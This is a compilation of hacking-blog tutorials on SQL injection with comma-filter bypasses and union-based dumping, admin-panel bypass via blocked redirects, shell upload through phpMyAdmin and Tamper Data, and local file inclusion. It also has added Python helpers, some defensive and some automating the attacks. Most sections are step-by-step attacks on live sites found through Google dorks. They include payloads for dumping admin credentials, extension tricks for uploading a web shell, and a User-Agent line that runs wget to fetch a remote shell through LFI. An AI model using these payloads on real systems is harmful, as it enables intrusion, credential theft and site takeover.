Sql Injection – Inject A Site When Commas Are Blocked

In this tutorial I will show you how to inject a site when commas are blocked by a WAF or an input filter. Once you know the tricks it is easy.

There are several ways to get around comma filtering in SQL injection, but they do not all work in the same situation, so read the note under each one.

# Method 1

By hiding the comma inside a MySQL versioned comment. MySQL executes whatever is inside /*! ... */, so the query still parses with its commas:

union select 1/*!,*/2/*!,*/3

A plain comment does not do the same job. MySQL discards /*,*/ completely, so

union select 1/*,*/ 2/*,*/ 3

becomes select 1 2 3 and fails with a syntax error. Note also that the comma byte is still present in the request with either form, so this only beats a WAF that strips comments before matching, not one that rejects any comma at all.

# Method 2

We can use CHAR(44). 44 is the ASCII code of the comma, so CHAR(44) evaluates to the string ",". It is a value, not a separator: a query such as

union select 1,CHAR(44), 2,CHAR(44), 3

still contains four real commas and will still be caught. CHAR(44) is only useful when you need a comma as data inside the result (for example as a separator in concatenated output) and the filter rewrites or strips the literal character; the separating commas still have to be handled by one of the other methods.

# Method 3

We can use JOIN. Each value comes from its own derived table and the join puts them side by side, so no comma is needed anywhere in the query:

union select * from ((select 1)a join (select 2)b join (select 3)c)

To pull real data, give each subquery a column instead of a constant, for example (select user())a join (select version())b. This one works even against a WAF that blocks every comma, because the payload really has none.

# Method 4

URL encoding (also called percent-encoding) represents a character in a URL as the percent sign followed by the two hexadecimal digits of its byte value. A comma is byte 44 in decimal, 2C in hexadecimal, so its URL-encoded form is %2C:

union select 1%2C 2%2C 3

This only helps when the WAF inspects the raw query string while the application decodes it before building the query. A WAF that decodes before matching sees the comma.

# Method 5

Some tutorials give %82 as a replacement for the comma:

union select 1%82 2%82 3

Be careful with this one. Byte 0x82 is not a comma in ASCII or UTF-8; in Windows-1252 it is the single low quotation mark ‚, which only turns into a comma if a best-fit character conversion on the server folds it. Treat it as unreliable and confirm it against the target before depending on it.

# Method 6

Sometimes plain URL encoding is not enough, because the WAF decodes once before matching. You can then try double URL encoding: the % of the first encoding is itself encoded as %25, so the comma %2C becomes %252C:

union select 1%252C 2%252C 3

The catch is that this needs two decoding steps somewhere in the path (for example the WAF or web server decodes once and the application decodes again). If the application decodes only once, the query receives the literal text %2C, which is not a comma and gives a SQL error.
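To see which of these methods actually survives a comma filter, here is an added example (my code, not part of the original tutorial) that simulates a naive blacklist WAF in front of a page that concatenates a decoded parameter into SQL. SQLite stands in for MySQL so that it runs offline, which is also why the versioned-comment form /*!,*/ is not exercised (SQLite has no such construct); the posts and users tables, their rows and the WAF rule are constructed for the example.

```python
import sqlite3
from urllib.parse import unquote


def make_db():
    """Constructed sample data (assumption); SQLite stands in for MySQL so this runs offline."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE posts (id INTEGER, title TEXT, body TEXT);
        INSERT INTO posts VALUES (1, 'Hello', 'first post');
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret');
    """)
    return db


def naive_comma_waf(raw_param):
    """Hypothetical blacklist WAF: rejects a request whose raw parameter holds a literal comma."""
    return "," in raw_param


def vulnerable_lookup(db, raw_param):
    """The application decodes the parameter exactly once and concatenates it into SQL (the bug)."""
    decoded = unquote(raw_param)
    rows = db.execute("SELECT title, body FROM posts WHERE id = " + decoded).fetchall()
    return [tuple(str(v) for v in row) for row in rows]


# Raw parameter values as they would travel on the wire, one per method above.
PAYLOADS = {
    "comment":        "1 union select 1/*,*/2",    # comma byte still present: the WAF sees it
    "url_encoded":    "1 union select 1%2C2",      # comma appears only after the app decodes
    "double_encoded": "1 union select 1%252C2",    # decodes once to 1%2C2, which is not a comma
    "join": "1 union select * from ((select username from users where id=1)a "
            "join (select password from users where id=1)b)",   # no comma anywhere
}


def attempt(name):
    """Returns 'blocked', 'SQL error: ...' or the rows the injected query produced."""
    raw = PAYLOADS[name]
    if naive_comma_waf(raw):
        return "blocked"
    try:
        return vulnerable_lookup(make_db(), raw)
    except sqlite3.Error as exc:
        return f"SQL error: {exc}"


if __name__ == "__main__":
    for name in PAYLOADS:
        print(f"{name:15} -> {attempt(name)}")
```

The comment form is stopped by the literal-comma rule, plain URL encoding reaches the database as a real comma, double encoding only produces a syntax error because nothing decodes it a second time, and the JOIN form extracts the admin credentials without a single comma in the request.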

Thanks for reading guys. My next tutorial will be on bypassing white-space filters. Keep sharing and learning 🙂

Bypass The Admin Panel Using No Redirection

In this post I will show you how you can bypass an admin panel using the NoRedirect add-on. A lot of hand-written admin panels fall to this trick. The cause is a simple coding mistake: the protected page sends a Location header pointing at the login page when there is no session, but the script does not stop after sending it, so the protected page is still rendered and sent along with the redirect. Normally the browser follows the redirect before you see anything; block the redirect and you see the page.

Pre-requisite:

  • Mozilla Firefox
  • No redirect Addon
  • Brain 😉

What can an attacker do?

  • Access the admin panel without logging in.
  • Make changes to the site through it.
  • Use an upload form in the panel to plant a shell.

So let's get to work.

  • Download and install the NoRedirect add-on. If you don't have it, get it from the Firefox add-ons site.
  • Open the admin panel of the targeted website.

For example: http://vuln-web.com/admin/index.php

  • Now we guess the file names in the admin folder so that we can request a protected page directly. If guessing fails, spider the whole site and pick the pages from there.
http://vuln-web.com/admin/index.php        (same Login Page)
http://vuln-web.com/admin/login.php        (Error, Page Not Found)
http://vuln-web.com/admin/home.php         (Error, Page Not Found)
http://vuln-web.com/admin/welcome.php      (Error, Page Not Found)
http://vuln-web.com/admin/dashboard.php    (Error, Page Not Found)
http://vuln-web.com/admin/default.php      (Error, Page Not Found)
http://vuln-web.com/admin/admin.php        (Redirected to index page )
  • http://vuln-web.com/admin/admin.php redirected us to the index page, which means the file exists and is a protected page, so that is the one we request directly.
  • To see its body we have to stop the browser from following the redirect. Open the NoRedirect add-on (press the Alt key to show the menu bar if it is hidden) and add a rule for the admin panel URL.
 example: http://vuln-web.com/admin/
  • Now request admin.php again. This time the browser stays on admin.php instead of jumping to index.php, and if the page was rendered behind the redirect you are looking at the admin panel.

Done. The only work is guessing the file names in the admin folder; if you cannot find any, spider or crawl the site and request the pages it finds. If a page comes back empty, or with only a short "redirecting" body, the developer did stop after the redirect and this trick will not work there.
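The bug behind this trick, as an added example (my code, not the page's): two WSGI handlers in Python that mirror a PHP admin page with and without exit() after header('Location: ...'), a client that, like the NoRedirect add-on, refuses to follow redirects, and a check that tells the two apart. The cookie-based session test, the dashboard markup and the path names are assumptions made for the example.

```python
from wsgiref.util import setup_testing_defaults

DASHBOARD = "<h1>Admin dashboard</h1><a href='users.php?action=delete&id=1'>delete user</a>"
LOGIN_URL = "/admin/index.php"


def logged_in(environ):
    # Assumption: a valid admin session is any cookie named admin_session.
    return "admin_session=" in environ.get("HTTP_COOKIE", "")


def vulnerable_admin(environ, start_response):
    """Mirrors PHP that calls header('Location: index.php') but never exit()s:
    the 302 is sent, execution continues, and the protected page is rendered anyway."""
    if not logged_in(environ):
        start_response("302 Found", [("Location", LOGIN_URL), ("Content-Type", "text/html")])
        # BUG: no return here, so the dashboard below is still emitted
    else:
        start_response("200 OK", [("Content-Type", "text/html")])
    return [DASHBOARD.encode()]


def fixed_admin(environ, start_response):
    """Stop as soon as the redirect is issued (header(...); exit; in PHP)."""
    if not logged_in(environ):
        start_response("302 Found", [("Location", LOGIN_URL), ("Content-Type", "text/html")])
        return [b""]
    start_response("200 OK", [("Content-Type", "text/html")])
    return [DASHBOARD.encode()]


def request(app, path, cookie=""):
    """Minimal client that never follows redirects, which is what the NoRedirect add-on gives you."""
    environ = {}
    setup_testing_defaults(environ)
    environ["PATH_INFO"] = path
    environ["HTTP_COOKIE"] = cookie
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"] = status
        captured["headers"] = dict(headers)

    body = b"".join(app(environ, start_response))
    return captured["status"], captured["headers"], body.decode()


def leaks_behind_redirect(app, path, valid_cookie):
    """True when an unauthenticated request is redirected yet receives the same body an
    authenticated request gets: exactly the condition the add-on trick exploits."""
    status, headers, anon_body = request(app, path)
    _, _, auth_body = request(app, path, cookie=valid_cookie)
    return status.startswith("3") and "Location" in headers and anon_body == auth_body
```

Both handlers answer an anonymous request with 302 Found; only the vulnerable one ships the dashboard in the body of that response, which is what the browser shows once redirects are blocked.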

Thanks for reading guys, keep sharing and practising.

Shell Uploading Via Phpmyadmin

In this tutorial I will show you shell uploading via phpMyAdmin step by step. For those who already know this trick I am sorry, but many of my friends don't.

phpMyAdmin should be protected with a password, but there are still websites that leave it open, or that use a MySQL account with far more privilege than it needs. Writing a file this way needs three things: the FILE privilege on the MySQL account, a secure_file_priv setting that does not forbid the target directory, and write permission for the MySQL service account on that directory. MySQL also refuses to overwrite an existing file, so pick a new name.

  • First we must know the document root, for example from a phpinfo.php page.
  • Now go to phpMyAdmin and create a database.

I created a database named shell; use whatever name you like.

  • Open the database, go to Structure and create a table with one column. After clicking Go, enter a column name and set its type to TEXT.

  • Then go to Insert, paste your uploader code into the column and click Go.

  • Now open the table, go to the SQL tab and run this query (adjust the path to the document root you found; MySQL accepts forward slashes on Windows):

SELECT * FROM shell INTO OUTFILE 'C:/wamp/www/shell/shell.php'

  • Our uploader is now written into the web root. Open it at the matching URL and upload your shell from there. 😉

Post Parameter SQL Injection With Live HTTP Header

Hello everyone, in this session I will show you POST parameter SQL injection with Live HTTP Headers, so read carefully. For this injection you will need the Firefox add-on called Live HTTP Headers.

Be Patient while Reading 😉

Code:
index.php?detailrecid=4
or
index.php?maincat_id=1&subcat_id=17
When we add a single quote ' to test for the vulnerability the web content changes: we get an empty page or a MySQL error. Usually this is good and shows us a SQLi vulnerability. But in this tutorial we will not go through the usual procedure of finding the column count with order by / group by on those links.

So let's go to the music page shown below.

Code:

index.php?maincat_id=1

There are many songs and three buttons (links) for every song.

If we hover the mouse over the first button (Licence) we get a hint in the lower left corner of Firefox showing the URL we will visit if we click it.

Code:

www.<our_site_in_challenge>.com/license.php

Same is true if we go with mouse over third button (Demo)

Code:

www.<our_site_in_challenge.com>/demos/music/jacosm/ambience-deluxe.mp3

BUT if we hover over the second button (Download) we don't get that hint any more. We don't see the URL that would be visited if we clicked it, as we did with the other two buttons.

Why does that happen?

The HTTP/1.1 specification defines several request methods: GET, POST, HEAD, OPTIONS, PUT, DELETE, TRACE and CONNECT. Most of the time we use GET and POST. A link shows its URL on hover because it is a GET; the Download button is a form that submits with POST, so its parameters travel in the request body, not in the URL.

OK, now start Live HTTP Headers and you will get a dialogue.

Make sure the Capture box is checked, and if there are already some headers in the window click the Clear button so we start from an empty state.

After clicking the Download button the Live HTTP Headers dialog changes, as it has captured the request sent to the server.

In the capture we can see that it was really a POST request, as we assumed, and in the request body we can see which parameters were sent to the server.

We couldn't see them until we intercepted them with Live HTTP Headers (or read the web page HTML source code). BTW, the Capture check box can be unchecked now as we don't want to capture further requests.

Let's click on the first line in Live HTTP Headers above the POST data section (http://www.<our_site_in_challenge>.com/index.php) and then on the Replay button in the lower left corner of the dialog.

We get a new dialogue.

Look in the POST Content section of the dialog: there are the parameters we can modify.
Now we can use our usual SQLi strategies to test the vulnerability, find the column count and prepare the command to inject. I have already added ' after the recid parameter. When I click the Replay button (right lower corner of the dialog) our modified request is sent to the server and we can follow the result in Firefox.

So the recipe from here is easy: modify the POST content further to build your SQLi command, then press Replay again to send it to the server. One thing to watch when you edit a body by hand: the Content-Length header must match the new body length, otherwise the server truncates or rejects the request. BTW, the site in this challenge can be injected with union-based or error-based SQLi.
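What Replay does under the hood, as an added Python example (my code, not from the tutorial): parse a captured POST the way Live HTTP Headers shows it, swap one field, re-encode the body, recompute Content-Length, and produce the first probes you would send against the hidden parameter. The captured request, the host name and the field names are constructed for the example.

```python
from urllib.parse import parse_qsl, urlencode

# Constructed capture (assumption) in the form Live HTTP Headers displays it.
CAPTURED = (
    "POST /index.php HTTP/1.1\r\n"
    "Host: www.example-challenge.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 23\r\n"
    "\r\n"
    "recid=4&action=download"
)


def parse_request(raw):
    """Split a raw HTTP request into (request line, header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return lines[0], headers, body


def build_request(request_line, headers, body):
    """Reassemble the request; Content-Length is recomputed from the new body."""
    headers = dict(headers)
    headers["Content-Length"] = str(len(body.encode()))
    head = "\r\n".join([request_line] + [f"{k}: {v}" for k, v in headers.items()])
    return head + "\r\n\r\n" + body


def tamper_post(raw, param, new_value):
    """Replay helper: change (or add) one form field and re-encode the body correctly."""
    request_line, headers, body = parse_request(raw)
    fields = parse_qsl(body, keep_blank_values=True)
    fields = [(k, new_value if k == param else v) for k, v in fields]
    if param not in dict(fields):
        fields.append((param, new_value))
    return build_request(request_line, headers, urlencode(fields))


def sqli_probes(raw, param, value):
    """First tests against a POST field: bare quote, balanced quote, and an ORDER BY probe."""
    return {
        "quote":      tamper_post(raw, param, value + "'"),
        "balanced":   tamper_post(raw, param, value + "' AND '1'='1"),
        "order_by_5": tamper_post(raw, param, value + "' ORDER BY 5-- -"),
    }


def content_length_ok(raw):
    """The check a server performs: does the header agree with the bytes that follow it?"""
    _, headers, body = parse_request(raw)
    return int(headers["Content-Length"]) == len(body.encode())
```

The quote is sent URL-encoded as %27, just as the browser would encode it, and every generated request carries a Content-Length that matches its body, which is the detail most often wrong in a hand-edited replay.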

I think you enjoyed this POST parameter SQL injection tutorial. Keep practising and learning.

Shell Uploading Via Tamper Data

In this session we will discuss shell uploading via Tamper Data, i.e. bypassing an upload restriction. Say you have logged in to an admin panel and the upload form only accepts images with .jpg or .png extensions, so you cannot upload a shell directly. Read this tutorial carefully, step by step.

This trick works when the extension check runs in the browser (JavaScript) rather than on the server, because Tamper Data edits the request after the browser has already approved it. We will bypass the check using a .jpg extension, so let's start.

  • Go to the upload form and rename your shell with a .php.jpg extension, for example shell.php to shell.php.jpg.

  • Now click Tools > Tamper Data > Start Tamper and submit the upload.
  • Tamper the request: in the POST data find the filename of your file, change shell.php.jpg back to shell.php and click OK.

  • If the server never re-checks the name, your shell is now uploaded; just browse to it.

Advanced shell uploading: bypassing extension checks

1) shell.jpg.php (passes a check that only looks for "jpg" somewhere in the name; the server still runs it as PHP)
2) shell.jpg.PhP (case obfuscation against a case-sensitive blacklist)

3) shell.php;.jpg (IIS 6 treated the semicolon as the end of the file name)

4) shell.php%00.jpg (the infamous null byte: PHP before 5.3.4 cut the file name at the null, so the file was saved as shell.php)

5) shell.php.test (Apache mod_mime works through all the extensions and uses the ones it recognises, ignoring "test")

6) shell.php.xxxjpg (still ends in jpg, but .xxxjpg is not a recognised extension, so Apache falls back to .php)

7) .phtml (a commonly used PHP-parsed extension often forgotten about)

8) .php3/.php4/.php5 (valid PHP extensions possibly left out of extension blacklists)

All of these beat blacklists. The defence is an allowlist of extensions, a server-generated file name, a content check on the uploaded bytes, and a storage directory where the web server does not execute scripts.
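A server-side check that rejects every name in the list above, as an added example (my code, not the tutorial's or any product's): an allowlist of extensions applied to every dot-separated segment, rejection of control and separator characters, a server-chosen stored name, and a magic-byte check on the content. The allowed types, the magic values and the stored-name prefix are assumptions made for the example.

```python
import os
import re

ALLOWED = {"jpg", "jpeg", "png", "gif"}          # assumed allowlist for an image upload form

# Magic bytes for the allowed types (assumption: these are the only types accepted).
MAGIC = {
    "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8",
}

# The names from the list above; "%00" arrives at the server as a real null byte.
BYPASS_NAMES = [
    "shell.jpg.php", "shell.jpg.PhP", "shell.php;.jpg", "shell.php\x00.jpg",
    "shell.php.test", "shell.php.xxxjpg", "shell.phtml", "shell.php5",
    "shell.php.jpg",   # the Tamper Data trick: renamed to shell.php after the client-side check
]


def safe_upload_name(filename, stored_prefix="upload"):
    """Return the name to store the file under, or None to reject the upload.

    Every extension segment after the base name must be on the allowlist, so Apache's
    multiple-extension fallback has nothing to run; nulls, control characters and path
    separators are rejected outright; the original base name is never reused.
    """
    if not filename or re.search(r"[\x00-\x1f;/\\]", filename):
        return None
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return None
    exts = parts[1:]
    if any(e not in ALLOWED for e in exts):      # catches php, phtml, php5, test, xxxjpg ...
        return None
    return f"{stored_prefix}.{exts[-1]}"


def accept_upload(filename, data):
    """Name check plus content check: the bytes must start like the type the name claims."""
    stored = safe_upload_name(filename)
    if stored is None:
        return None
    ext = stored.rsplit(".", 1)[1]
    if not data.startswith(MAGIC[ext]):
        return None
    return stored


def audit(names=BYPASS_NAMES):
    """Which of the bypass names would still get through: should be an empty list."""
    return [n for n in names if safe_upload_name(n) is not None]
```

A production version would also generate the stored name randomly (uuid4) rather than with a fixed prefix, and would write into a directory the web server serves as static files only.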

Local File Inclusion (LFI) Vulnerability Attack

In this tutorial we will discuss the local file inclusion vulnerability, how it occurs and how it can be patched. First an introduction to file inclusion.

A file inclusion vulnerability lets an attacker make the web application include a file it was never meant to include, and since include() also executes any PHP code in the file, it can lead to code execution on the web server.

What is a Local File Inclusion (LFI) vulnerability?

Local file inclusion is including a local file that is available on the web server. It occurs when user input controls the path of the file that is included. When that input is not properly validated, an attacker can supply the location of sensitive files and read them, or include a file whose content they control.

Finding Local file Inclusion (LFI)vulnerability in website

Now we are going to find a local file inclusion on a website. We found a site; let's check whether it is vulnerable.

 www.vulnerablewebsite.com/view.php?page=contact.php

Now let's replace contact.php with ../ so the URL becomes

www.vulnerablewebsite.com/view.php?page=../

After requesting this page we get an error, which means there is a big chance of a local file inclusion vulnerability. Let's go to the next step.

Warning: include(../) [function.include]: failed to open stream: No
such file or directory in /home/sirgod/public_html/website.com/view.php on
line 1337

Now let's check for /etc/passwd to see whether it is really vulnerable. Make the request

www.vulnerablewebsite.com/view.php?page=../../../etc/passwd

We get an error and no /etc/passwd: three levels up is not enough to reach the root of the file system.

Warning: include(../../../etc/passwd) [function.include]: failed to open stream: No
such file or directory in /home/sirgod/public_html/website.com/view.php on
line 1337

So we go more directories up. The error message tells us the script lives four directories below / (home, sirgod, public_html, website.com), so four or more ../ will do; extra ones are harmless once you reach /.

www.vulnerablewebsite.com/view.php?page=../../../../../etc/passwd

If you will get a page like this that means you have successfully Included a /etc/passwd file.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin

We successfully included a file. The next step is to include /proc/self/environ, the environment of the process that is serving our request, so replace /etc/passwd with /proc/self/environ as shown below.

 www.vulnerablewebsite.com/view.php?page=../../../../../proc/self/environ

If you get something like this, you have successfully included /proc/self/environ.

DOCUMENT_ROOT=/home/sirgod/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.vulnerablewebsite.com
HTTP_REFERER=http://www.vulnerablewebsite.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00
PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200
REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/sirgod/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster@website.com
SERVER_NAME=www.website.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.vulnerablewebsite.com Port 80

That output means /proc/self/environ is accessible. If you get a blank page or an error, /proc/self/environ is not readable by the web server (or the OS is FreeBSD, which has no /proc by default), and this route will not work.

Injecting malicious code into a Local File Inclusion vulnerable website

Now let's inject our code through /proc/self/environ. How can we do that? The environment dump above contains HTTP_USER_AGENT, copied straight from our request, and include() executes any PHP it finds in the included file. So we put PHP code in the User-Agent header. Use the Tamper Data add-on for Firefox to change the User-Agent: start Tamper Data and re-request the URL

 www.vulnerablewebsite.com/view.php?page=../../../../../proc/self/environ

Tamper the request, put your uploader script in the User-Agent field and submit. After submitting you will see your uploader rendered inside the /proc/self/environ page; just browse and upload your shell.

You can also fetch your shell onto the server with wget:

 <?system('wget www.shell.com/shell.txt -O shell.php');?>

Put this in the User-Agent and request the page. The command is executed through system(); it downloads the .txt shell from www.shell.com/shell.txt and saves it as shell.php in the working directory of the web server process (usually the script's directory), and our shell is created. If it doesn't
work, try exec() or passthru(), because system() may be disabled on the web server through disable_functions in php.ini.

Accessing our shell

Now let's check whether our code was executed and the shell is present:

www.vulnerablewebsite.com/shell.php

Our shell is there. The injection was successful.
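The patch side of the story, as an added Python example (my code, not the page's): a containment check, an allowlist-based replacement for include($_GET['page']), the traversal-depth helper used above, and a quick detector for a leaked /etc/passwd in a response. The web root is taken from the error message earlier in this tutorial; the allowlist of includable pages is an assumption.

```python
import os
import re

WEB_ROOT = "/home/sirgod/public_html"          # document root from the error message above
ALLOWED_PAGES = {"contact.php", "about.php"}    # assumed allowlist of pages view.php may include


def inside_root(page, web_root=WEB_ROOT):
    """Containment check alone: resolve the path and require it to stay under the web root.
    This stops ../ traversal but not a wrapper like php:// or a user-uploaded file in the root."""
    root = os.path.realpath(web_root)
    target = os.path.realpath(os.path.join(root, page))
    return os.path.commonpath([root, target]) == root


def resolve_include(page, web_root=WEB_ROOT):
    """Hardened replacement for include($_GET['page']): reject null bytes and stream wrappers,
    require the page to be on the allowlist, and keep the containment check as defence in depth."""
    if "\x00" in page or "://" in page:
        return None
    if page not in ALLOWED_PAGES:
        return None
    if not inside_root(page, web_root):
        return None
    return os.path.realpath(os.path.join(web_root, page))


def traversal_payload(depth, target):
    """Enough ../ to climb out of a script that sits `depth` directories below /."""
    return "../" * depth + target.lstrip("/")


PASSWD_LINE = re.compile(r"^root:[^:]*:0:0:", re.M)


def looks_like_passwd(body):
    """Signal used while testing: did the response embed /etc/passwd?"""
    return bool(PASSWD_LINE.search(body))
```

The allowlist is what actually closes the hole; the realpath containment check only guards against traversal and is kept because it is cheap and catches mistakes in the allowlist.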

I think everybody enjoyed this tutorial. Keep practising and learning. 🙂

SQL injection Union Based Manually Step by Step

Hello guys, hope you are doing well. In this tutorial we will discuss basic union-based SQL injection done manually. First I would recommend that you learn the basics of SQL from w3schools. Let me start with an introduction.

What is SQL Injection ?

SQL injection is a code injection vulnerability in the database layer of an application. A successful SQL injection exploit can read and modify the backend database. It occurs when user input is concatenated into a SQL query without being validated or escaped, so the input can change the structure of the query.

What an attacker can do ?

  • An attacker can inject into the website and read and modify the database.
  • An attacker can take control of your admin panel, if you have one.
  • If the targeted website is an e-commerce site that stores customer information, the attacker can easily get it.
  • An attacker can upload a shell and deface the website.

So lets start our work….

Step 1:

Find a SQL injection vulnerable website with Google dorks (large lists of SQLi dorks are easy to find online):

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:shop.php?id=

Step 2:

Now check for the vulnerability by adding a single quote after the id parameter and hitting Enter. If you get an error message such as a SQL syntax error, the site is vulnerable to SQL injection.

www.vulnerablesite.com/index.php?id=1'

Step 3:

Now that we know the site is vulnerable, we have to find the number of columns using the ORDER BY statement. The --+ at the end is a MySQL comment (the + becomes a space in the URL) that swallows the rest of the original query, including its closing quote.

www.vulnerablesite.com/index.php?id=1' order by 1 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 2 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 3 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 4 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 5 --+ [error]

ORDER BY 5 gives an error while ORDER BY 4 does not, so the query returns 4 columns.

Step 4:

Now we will find the vulnerable (reflected) column using UNION SELECT. If the page shows the original row instead of our numbers, use a non-existent id such as id=-1' so only the UNION row is displayed.

www.vulnerablesite.com/index.php?id=1' union select 1,2,3,4 --+

The number that appears on the page is the reflected column; here it is column 2. We will put the following in place of that number:

Version - @@version or version()
Database - database()
Current User - user()

Step 5 :

Now we will find the table names. Put this query in the vulnerable column (the + signs are URL-encoded spaces; 0x3c62723e is <br> in hex, so every table name is printed on its own line):

(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE())

Step 6:

Now we find the column names of a particular table with this query. The table name is given as a hex string (for example 0x61646d696e for admin) so that no quotes are needed:

www.vulnerablesite.com/index.php?id=1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=[table name in hex] --+

yeah now we got column name of table name and our next target is to dump data.

Step 7:

Now we have the database, the table name and the column names, so we can dump data from the targeted website. Replace column_name with the target columns, for example username and password, and add the target table after from. 0x3a is a colon, used as the separator between the two values.

www.vulnerablesite.com/index.php?id=1' union select 1,group_concat(username,0x3a,password),3,4 from admin--+

yeah we got the username and password.
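Steps 3, 4 and 7 automated against a vulnerable page, as an added example (my code, not part of the tutorial), with the parameterised version beside it so the fix is visible. SQLite stands in for MySQL so that it runs offline: information_schema and 0x... hex strings are MySQL-only, so the dump step uses || ':' || instead of 0x3a; the articles and admin tables and their rows are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed sample schema and data (assumption); SQLite stands in for MySQL."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER, title TEXT, body TEXT, author TEXT);
        INSERT INTO articles VALUES (1, 'Welcome', 'first article', 'editor');
        CREATE TABLE admin (id INTEGER, username TEXT, password TEXT);
        INSERT INTO admin VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return db


def vulnerable_page(db, id_param):
    """index.php?id=... as described above: the value is quoted and concatenated into SQL,
    and the template prints only title and body (columns 2 and 3)."""
    sql = f"SELECT id, title, body, author FROM articles WHERE id = '{id_param}'"
    rows = db.execute(sql).fetchall()
    return "".join(f"<h1>{r[1]}</h1><p>{r[2]}</p>" for r in rows)


def safe_page(db, id_param):
    """The fix: a bound parameter, so the input can never change the query's structure."""
    rows = db.execute("SELECT id, title, body, author FROM articles WHERE id = ?",
                      (id_param,)).fetchall()
    return "".join(f"<h1>{r[1]}</h1><p>{r[2]}</p>" for r in rows)


def count_columns(page, max_cols=30):
    """Step 3: ORDER BY n succeeds while n <= column count; the first error reveals the count."""
    for n in range(1, max_cols + 1):
        try:
            page(f"1' ORDER BY {n} -- ")
        except sqlite3.Error:
            return n - 1
    return None


def find_reflected(page, ncols):
    """Step 4: UNION SELECT distinct markers and see which ones land in the HTML."""
    markers = ",".join(str(1000 + i) for i in range(1, ncols + 1))
    html = page(f"1' UNION SELECT {markers} -- ")
    return [i for i in range(1, ncols + 1) if str(1000 + i) in html]


def dump_admins(page, ncols, column):
    """Step 7: put group_concat in a reflected column (MySQL's 0x3a becomes || ':' || here)."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[column - 1] = "group_concat(username || ':' || password)"
    return page(f"1' UNION SELECT {','.join(cols)} FROM admin -- ")


if __name__ == "__main__":
    db = make_db()
    page = lambda p: vulnerable_page(db, p)
    n = count_columns(page)
    shown = find_reflected(page, n)
    print(n, shown, dump_admins(page, n, shown[0]))
```

The same probes against safe_page return nothing, because the whole injected string is compared with the id column as data rather than parsed as SQL.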

Keep practising, but don't harm any site.

How To Access Your LocalHost Any Where

You have spent hours on your system setting up a CMS. It is perfectly set up with a nice theme and sample posts, and now you want to test it on a mobile device or tablet, or your client wants to try it out, but you don't have time to migrate it to a public server. You can give them a quick demo from your localhost itself, without any web hosting: you can access your localhost from anywhere.

How is it possible to access your localhost from anywhere?

It is possible through secure tunnelling services such as

  1. Ngrok
  2. PageKite
  3. Forward
  4. ProxyLocal
  5. Browser Stack

These services provide a secure tunnel from the internet to your PC. They give you a publicly accessible URL and forward the requests that arrive on it to your local system. Remember that while the tunnel is up, anyone who learns the URL can reach your CMS, including its admin login, so keep the demo short and close the tunnel when you are done.

So lets start our main work.

Here I am using ngrok; you can download it from the official website.

  • First extract ngrok onto your desktop.
  • Press Win+R, type cmd and hit Enter.
  • Go to the desktop using the cd command.

  • Now we will forward port 80. First start your WAMP/XAMPP server, then run the command ngrok http 80. When you enter it, ngrok shows a new screen in your command prompt with the public forwarding URL.

Now we have a secure tunnel. Open the forwarding URL and you can access your localhost from anywhere.

HTML Injection Step by Step For Begineers

Hello guys, hope you are doing well and practising. Today in this post we will discuss HTML injection and why it is risky.

What is HTML injection?
